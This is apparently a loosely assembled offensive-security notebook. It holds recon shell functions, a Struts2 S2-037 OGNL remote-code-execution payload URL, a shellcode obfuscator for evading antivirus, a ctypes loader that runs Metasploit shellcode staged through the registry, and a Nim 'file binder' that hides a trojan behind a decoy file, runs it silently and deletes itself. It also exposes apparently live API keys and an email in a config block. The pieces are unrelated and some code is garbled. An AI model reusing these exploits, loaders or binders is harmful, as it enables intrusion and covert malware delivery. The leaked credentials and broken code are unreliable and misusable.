Recon() {
./assetfinder --subs-only $1 > $1-assetfinder.txt;./ksubdomain -d $1 -silent -skip-wild -full -o $1-ksubdomain.txt;./subfinder -d $1 -all -silent > $1-subfinder.txt;./findomain -t $1 -q > $1-findomain.txt;./amass enum -passive -norecursive -noalts -d $1 -o $1-amass.txt;cat *.txt | sort | uniq > $1-basic;rm -rf *.txt
}
Mass() {
cp $1-basic ../subdomain2;cd ../subdomain2;altdns -i $1-basic -w words.dic -o $1-altdns.txt;cat $1-altdns.txt | ./massdns/bin/massdns -r ./massdns/lists/resolvers.txt -t A -o S -w $1_A_CNAME.txt;cat $1_A_CNAME.txt | sed 's/A.*//; s/..$//; s/CN.*//' > $1-massdns.txt;cat $1-basic $1-massdns.txt | sort | uniq > $1-all;rm -rf *.txt
}
3B822693-993e-1dac2-632e-b97337be0e4
docker pull medicean/vulapps:s_struts2_s2-037
docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
http://ip:80/orders/3/
(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=id
import random
import sys
string = '0123456789abcdef'
str_list = list(string)
random.shuffle(str_list)
string2 = ''.join(str_list)
a = open(sys.argv[1],'rb')
b = a.read().encode('hex')
list = []
for i in b:
b = string2.find(i)
list.append(b)
f = open('Offset_shellcode.py','w')
f.write("string = '{}'
".format(string2))
f.write("list = {}
".format(list))
f.write("buf = ''
for i in list:
buf+=string[i]
shellcode=bytearray(buf.decode('hex'))
")
补丁网盘链接:
链接: https://pan.baidu.com/s/1vo_teu41pA-v9OYfC9wprQ 密码: ndao
# 模块API配置
# Censys可以免费注册获取API:https://censys.io/api
censys_api_id = '27006dda-b551-40cc-a592-a2577847c764'
censys_api_secret = 'vXob9EOio9V7w2jTtBrZdI1iyYNzblCJ'
# Binaryedge可以免费注册获取API:https://app.binaryedge.io/account/api
# 免费的API有效期只有1个月,到期之后可以再次生成,每月可以查询250次。
binaryedge_api = ''
# Chinaz可以免费注册获取API:http://api.chinaz.com/ApiDetails/Alexa
chinaz_api = 'df69b6ddcb634105b2d6599151d5b02b'
# Bing可以免费注册获取API:https://azure.microsoft.com/zh-cn/services/
# cognitive-services/bing-web-search-api/#web-json
bing_api_id = ''
bing_api_key = ''
# SecurityTrails可以免费注册获取API:https://securitytrails.com/corp/api
securitytrails_api = ''
# https://fofa.so/api
fofa_api_email = 'm13724810865_2@163.com' # fofa用户邮箱
fofa_api_key = '1f8566b6d6c1e86d9622b14da3ee8d5d' # fofa用户key
# Google可以免费注册获取API:
# 免费的API只能查询前100条结果
# https://developers.google.com/custom-search/v1/overview#search_engine_id
# 创建自定义搜索引擎后需要在响应的控制面板上启用Search the entire web
google_api_id = '' # Google API自定义搜索引擎id
# https://developers.google.com/custom-search/v1/overview#api_key
google_api_key = '' # Google API自定义搜索key
# https://api.passivetotal.org/api/docs/
riskiq_api_username = ''
riskiq_api_key = ''
# Shodan可以免费注册获取API: https://account.shodan.io/register
# 免费的API限速1秒查询1次
shodan_api_key = 'CID5rmCYAFd391vHGcLlALXUBjAIOU4V'
# ThreatBook API 查询子域名需要收费 https://x.threatbook.cn/nodev4/vb4/myAPI
threatbook_api_key = ''
# VirusTotal可以免费注册获取API: https://developers.virustotal.com/reference
virustotal_api_key = ''
# https://www.zoomeye.org/doc?channel=api
zoomeye_api_usermail = ''
zoomeye_api_password = ''
# Spyse可以免费注册获取API: https://spyse.com/
spyse_api_token = ''
# https://www.circl.lu/services/passive-dns/
circl_api_username = ''
circl_api_password = ''
# https://www.dnsdb.info/
dnsdb_api_key = ''
# ipv4info可以免费注册获取API: http://ipv4info.com/tools/api/
# 免费的API有效期只有2天,到期之后可以再次生成,每天可以查询50次。
ipv4info_api_key = ''
# https://github.com/360netlab/flint
# passivedns_api_addr默认空使用http://api.passivedns.cn
# passivedns_api_token可为空
passivedns_api_addr = ''
passivedns_api_token = ''
# Github Token可以访问https://github.com/settings/tokens生成,user为Github用户名
# 用于子域接管和子域收集
github_api_user = ''
github_api_token = ''
# obtain Cloudflare API key from https://dash.cloudflare.com/profile/api-tokens
cloudflare_api_token = ''
默认是x64位的msf
from ctypes import *
from ctypes import wintypes
import ctypes
buf = b""
buf += b"x56xffxd5"
ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf))
LPBYTE = POINTER(c_byte)
ctypes.windll.kernel32.VirtualAlloc.restype = LPBYTE
ptr = ctypes.windll.kernel32.VirtualAlloc(0,800,0x3000,0x40)
data_len = wintypes.DWORD()
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647, "test", 0, 0, 0, byref(data_len))
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647,"test",0,None,ptr,byref(data_len))
ctypes.windll.Advapi32.RegDeleteValueA(-2147483647, "test")
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
#author @evilash
import os
import base64
import strfmt
import osproc
import nimcrypto
import nimcrypto/sysrand
let help = """
+-+-+-+-+-+-+-+-+-+-+-+-+-+
|N i m F i l e B i n d e r|
+-+-+-+-+-+-+-+-+-+-+-+-+-+
@evilash
It's a FileBinder writen by Nim
And just a *rough* tool of learning Nim
Usage:
./NimFileBinder <evil> <NormalFile> <key>
-h,--help : help
"""
func toByteSeq*(str: string): seq[byte] {.inline.} =
## Converts a string to the corresponding byte sequence.
@(str.toOpenArrayByte(0, str.high))
proc EncryptFile(File1, File2, key: string): void =
var
Content1 = readFile(File1)
Content2 = readFile(File2)
EnContent1 = encode(Content1)
EnContent2 = encode(Content2)
var
data: seq[byte] = toByteSeq(decode(EnContent1))
envkey: string = key
ectx, dctx: CTR[aes256]
key: array[aes256.sizeKey, byte]
iv: array[aes256.sizeBlock, byte]
plaintext = newSeq[byte](len(data))
enctext = newSeq[byte](len(data))
b64iv: string
# Create Random IV
discard randomBytes(addr iv[0], 16)
# We do not need to pad data, `CTR` mode works byte by byte.
copyMem(addr plaintext[0], addr data[0], len(data))
# Expand key to 32 bytes using SHA256 as the KDF
var expandedkey = sha256.digest(envkey)
copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
ectx.init(key, iv)
ectx.encrypt(plaintext, enctext)
ectx.clear()
b64iv = encode(iv)
var B64EnCryContent: string = encode(enctext)
var BinderTemplete: string = """
import base64
import winim
import encodings
import nimcrypto
import nimcrypto/sysrand
import os
func toByteSeq*(str: string): seq[byte] {} =
## Converts a string to the corresponding byte sequence.
@(str.toOpenArrayByte(0, str.high))
var evilbase64 = "{}"
var data2: seq[byte] = toByteSeq(decode(evilbase64))
var BindFilebase64 = "{}"
var deb64iv = decode("{}")
var
envkey: string = "{}"
dctx: CTR[aes256]
key: array[aes256.sizeKey, byte]
iv: array[aes256.sizeBlock, byte]
crypttext = newSeq[byte]({})
dectext = newSeq[byte]({})
copyMem(addr crypttext[0], addr data2[0], len(data2))
var expandedkey = sha256.digest(envkey)
copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
copyMem(addr iv[0], addr deb64iv[0], aes256.sizeBlock)
dctx.init(key, iv)
dctx.decrypt(crypttext, dectext)
dctx.clear()
let decoded_Bindfile = decode(BindFilebase64)
var evilname: string = "{}"
var Bindfilename: string = "{}"
writeFile(Bindfilename, decoded_Bindfile)
var utf8evilname =convert(evilname,"GB2312","UTF-8")
var utf8Bindfilename =convert(Bindfilename,"GB2312","UTF-8")
WinExec("cmd /k start " & utf8Bindfilename, SW_HIDE);
writeFile(r"C:\Windows\Temp\" & utf8evilname, dectext)
#writeFile(r"C:\Windows\Temp\calc.txt" , dectext)
#copyFile("C:\Windows\Temp\calc.txt", "C:\Windows\Temp\calc.exe")
#removeFile("C:\Windows\Temp\calc.txt")
WinExec("cmd /c C:\Windows\Temp\" & utf8evilname, SW_HIDE);
#WinExec("cmd /c C:\Windows\Temp\calc.exe", SW_HIDE);
ShellExecute(0, "open", "cmd.exe", "/c del " & paramStr(0), NULL, SW_HIDE)
#WinExec("cmd.exe /c del temp.exe", SW_HIDE)
""".fmt("{.inline.}", B64EnCryContent, EnContent2, b64iv, envkey, len(data), len(data), File1, File2)
writeFile(r"outfile.nim", BinderTemplete)
proc CompileFile(): void =
let errC = execCmd("nim c --cpu:amd64 -d:mingw --app:gui -d:danger -d:strip --opt:size --passc=-flto --passl=-flto {}".fmt("outfile.nim"))
var rmhandle = tryRemoveFile("outfile.nim")
proc main() =
if paramCount() == 3:
var
TraojanFile: string = paramStr(1)
NormalFile: string = paramStr(2)
Enkey: string = paramStr(3)
EncryptFile(TraojanFile, NormalFile, Enkey)
CompileFile()
return
if paramCount() == 1 and (paramStr(1) == "-h" or paramStr(1) == "--help"):
echo help
return
if paramCount() == 0:
echo help
return
else:
echo " Expect two arguments
ex: ./NimFileBinder <evil> <NormalFile> <key>"
return
main()